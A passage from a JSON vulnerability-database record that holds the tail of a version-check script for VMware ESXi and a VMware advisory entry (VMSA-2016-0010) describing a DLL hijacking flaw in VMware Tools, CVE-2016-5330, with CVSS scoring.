'\\n Fixed build : ' + fixed_build +\n '\\n';\n\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESXi\", ver + \" build \" + build);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2019-11-06T16:05:29", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5331", "CVE-2016-5330"], "description": "**a. DLL hijacking issue in Windows-based VMware Tools **\n\nA DLL hijacking vulnerability is present in the VMware Tools \"Shared Folders\" (HGFS) feature running on Microsoft Windows. Exploitation of this issue may lead to arbitrary code execution with the privileges of the victim. In order to exploit this issue, the attacker would need write access to a network share and they would need to entice the local user into opening their document. \n\nThere are no known workarounds for this issue. \n\nVMware would like to thank Yorick Koster of [Securify B.V.](<https://securify.nl>) for reporting this issue to us. \n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2016-5330 to this issue. \n\nColumn 5 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "edition": 4, "modified": "2016-09-19T00:00:00", "published": "2016-08-04T00:00:00", "id": "VMSA-2016-0010", "href": "https://www.vmware.com/security/advisories/VMSA-2016-0010.html", "title": "VMware product updates address multiple security issues", "type": "vmware", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}]}
